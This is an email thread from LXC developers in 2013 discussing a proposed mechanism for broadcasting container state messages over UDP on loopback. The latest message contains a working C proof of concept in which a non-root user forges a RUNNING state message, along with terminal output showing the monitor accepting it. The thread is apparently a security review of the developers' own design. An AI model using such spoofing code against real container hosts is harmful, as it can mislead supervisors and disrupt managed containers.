<div dir="ltr">Hi Daniel,<div><br></div><div>Seems like my assumption was wrong (I was under the impression that calling setsockopt with SO_BROADCAST will require root privileges) as I was able to send fake state updates with my user account using following fake client;</div>
<div><br></div><div><div>#include <stdio.h></div><div>#include <string.h></div><div>#include <errno.h></div><div><br></div><div>#include <net/if.h></div><div>#include <arpa/inet.h></div><div>
#include <netinet/in.h></div><div><br></div><div>#include <lxc/lxc.h></div><div>#include <lxc/monitor.h></div><div><br></div><div>#define PORT 51423</div><div><br></div><div>int main(int argc, char *argv[]) {</div>
<div> int fd;</div><div> int yes = 1;</div><div> struct sockaddr_in addr;</div><div><br></div><div><span class="" style="white-space:pre"> </span>char *name = "0";</div><div><span class="" style="white-space:pre"> </span>char *lxcpath = "/var/lib/lxc";</div>
<div><br></div><div><span class="" style="white-space:pre"> </span>lxc_state_t state = RUNNING;</div><div><span class="" style="white-space:pre"> </span>struct lxc_msg msg = { .type = lxc_msg_state, .value = state};</div>
<div><br></div><div> strncpy(<a href="http://msg.name">msg.name</a>, name, sizeof(<a href="http://msg.name">msg.name</a>));</div><div> <a href="http://msg.name">msg.name</a>[sizeof(<a href="http://msg.name">msg.name</a>) - 1] = 0;</div>
<div><br></div><div> strncpy(msg.lxcpath, lxcpath, sizeof(msg.lxcpath));</div><div> msg.lxcpath[sizeof(msg.lxcpath) - 1] = 0;</div><div><br></div><div> fd = socket(AF_INET, SOCK_DGRAM, 0);</div><div>
if (fd < 0)</div>
<div> return -1;</div><div><br></div><div> memset(&addr, 0, sizeof(struct sockaddr_in));</div><div> addr.sin_family = AF_INET;</div><div> addr.sin_addr.s_addr = inet_addr("127.255.255.255");</div>
<div> addr.sin_port = htons(PORT);</div><div><br></div><div> if (setsockopt(fd, SOL_SOCKET, SO_BROADCAST, &yes, sizeof(yes)) < 0) {</div><div> printf("setsocktopt : %s", strerror(errno));</div>
<div> close(fd);</div><div> return -1;</div><div> }</div><div><br></div><div> sendto(fd, &msg, sizeof(msg), 0, (const struct sockaddr *)&addr, sizeof(addr));</div><div>
<br>
</div><div> close(fd);</div><div><span class="" style="white-space:pre"> </span>return 0;</div><div>}</div></div><div><br></div><div><div>caglar@qgq:~/Project$ gcc fakestate.c -o fakestate</div><div>caglar@qgq:~/Project$ id<br>
</div><div>uid=1000(caglar) gid=1000(caglar) groups=1000(caglar),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),107(lpadmin),124(sambashare),1001(vboxsf)</div><div>caglar@qgq:~/Project$ ./fakestate </div><div>caglar@qgq:~/Project$ </div>
<div><br></div></div><div><div>caglar@qgq:~$ sudo lxc-monitor -n [0-9]</div><div>'0' changed state to [RUNNING]</div></div><div><br></div></div><div class="gmail_extra"><br><br><div class="gmail_quote">On Mon, Apr 15, 2013 at 11:52 AM, S.Çağlar Onur <span dir="ltr"><<a href="mailto:caglar@10ur.org" target="_blank">caglar@10ur.org</a>></span> wrote:<br>
<blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex"><div dir="ltr">Hi Daniel,<div><br></div><div class="gmail_extra"><br><div class="gmail_quote"><div><div class="h5">On Mon, Apr 15, 2013 at 5:14 AM, Daniel Lezcano <span dir="ltr"><<a href="mailto:daniel.lezcano@free.fr" target="_blank">daniel.lezcano@free.fr</a>></span> wrote:<br>
<blockquote class="gmail_quote" style="margin:0px 0px 0px 0.8ex;border-left-width:1px;border-left-color:rgb(204,204,204);border-left-style:solid;padding-left:1ex"><div>On 04/15/2013 07:53 AM, S.Çağlar Onur wrote:<br>
> Hi Daniel,<br>
><br>
><br>
> On Sun, Apr 14, 2013 at 4:42 PM, Daniel Lezcano<br>
</div><div><div>> <<a href="mailto:daniel.lezcano@free.fr" target="_blank">daniel.lezcano@free.fr</a> <mailto:<a href="mailto:daniel.lezcano@free.fr" target="_blank">daniel.lezcano@free.fr</a>>> wrote:<br>
><br>
> On 04/14/2013 09:56 PM, S.Çağlar Onur wrote:<br>
> > Hi all,<br>
> ><br>
> > I had some free time today so I tried to implement something using<br>
> > AF_INET messages over loopback broadcast address. I'm not including<br>
> > the patch here because gmail web interface damages it and that's<br>
> what<br>
> > I use right now so please use [1] to see it.<br>
> ><br>
> > I'm sending it to get your feedback and will submit it to list<br>
> if you<br>
> > are OK with that approach.<br>
> ><br>
> > P.S: I used 51423 as the port but of course it can be changed<br>
> > accordingly.<br>
> ><br>
> > [1]<br>
> ><br>
> <a href="https://github.com/caglar10ur/lxc-upstream/commit/123b20e2945ed2b4bc9e6e27b9ef398ec8fcae40.patch" target="_blank">https://github.com/caglar10ur/lxc-upstream/commit/123b20e2945ed2b4bc9e6e27b9ef398ec8fcae40.patch</a><br>
><br>
> Thanks for this code !<br>
><br>
> It sounds like the approach seems ok. My concern is the same than<br>
> Serge,<br>
> what can we do to ensure an event was sent by a container ?<br>
><br>
> We don't want someone to send fake events via UDP. We can't tolerate a<br>
> simple program messing a container supervisor and all the containers<br>
> (running an OS instance).<br>
><br>
> Assuming an user, which is not root, can't build an IP packet, we can<br>
> rely on the IP identification number to detect fake packets, no ?<br>
><br>
><br>
> I'm not sure about the right answer of that question. I was under the<br>
> impression that we are safe since kernel only allows root user to send<br>
> broadcast packages over loopback interface but I might<br>
> be completely wrong.<br>
<br>
</div></div>I don't find a confirmation about this anywhere. Do you have a pointer ?<br>
If it is the case, then that's cool because we are safe on this side.<br></blockquote><div><br></div></div></div><div><div>Unfortunately I don't have any but I'll try to write a test client to see what will happen. What should we do if that's not the case? I'm not a security guy at all so I really don't know whether just checking the sequence numbers will be sufficient or something more sophisticated is needed to ensure the authenticity of the messages.</div>
</div><div class="im"><div><br></div><blockquote class="gmail_quote" style="margin:0px 0px 0px 0.8ex;border-left-width:1px;border-left-color:rgb(204,204,204);border-left-style:solid;padding-left:1ex">
Is your code tested ? I mean, did you validate monitoring the events<br>
works with this approach ?<br></blockquote><div><br></div></div><div>I tested lxc-monitor and lxc-wait briefly with this code. On one terminal I start 9 containers in parallel while running lxc-monitor and lxc-wait in another one</div>
<div><br></div><div><div>caglar@qgq:~/Project/lxc/examples$ sudo ./concurrent_start </div><div>Starting the container (3)...</div><div>Starting the container (7)...</div><div>Starting the container (0)...</div>
<div>Starting the container (1)...</div><div>Starting the container (2)...</div><div>Starting the container (8)...</div><div>Starting the container (4)...</div><div>Starting the container (5)...</div><div>Starting the container (9)...</div>
<div>Starting the container (6)...</div><div><br></div><div><div>caglar@qgq:~$ sudo lxc-monitor -n [0-9]</div><div>'3' changed state to [STARTING]</div><div>'0' changed state to [STARTING]</div><div>'7' changed state to [STARTING]</div>
<div>'1' changed state to [STARTING]</div><div>'2' changed state to [STARTING]</div><div>'8' changed state to [STARTING]</div><div>'4' changed state to [STARTING]</div><div>'5' changed state to [STARTING]</div>
<div>'9' changed state to [STARTING]</div><div>'6' changed state to [STARTING]</div><div>'3' changed state to [RUNNING]</div><div>'9' changed state to [RUNNING]</div><div>'7' changed state to [RUNNING]</div>
<div>'2' changed state to [RUNNING]</div><div>'5' changed state to [RUNNING]</div><div>'6' changed state to [RUNNING]</div><div>'4' changed state to [RUNNING]</div><div>'0' changed state to [RUNNING]</div>
<div>'8' changed state to [RUNNING]</div><div>'1' changed state to [RUNNING]</div></div><div><br></div><div><div>caglar@qgq:~$ sudo lxc-wait -n 0 -s RUNNING</div><div>caglar@qgq:~$ </div><div><br></div></div>
</div><div> </div><blockquote class="gmail_quote" style="margin:0px 0px 0px 0.8ex;border-left-width:1px;border-left-color:rgb(204,204,204);border-left-style:solid;padding-left:1ex">
Thanks<br>
<span><font color="#888888"> -- Daniel<br>
<br>
</font></span></blockquote></div><br clear="all"><div>Best,</div><span class="HOEnZb"><font color="#888888">-- <br>S.Çağlar Onur <<a href="mailto:caglar@10ur.org" target="_blank">caglar@10ur.org</a>>
</font></span></div></div>
</blockquote></div><br><br clear="all"><div><br></div>-- <br>S.Çağlar Onur <<a href="mailto:caglar@10ur.org">caglar@10ur.org</a>>
</div>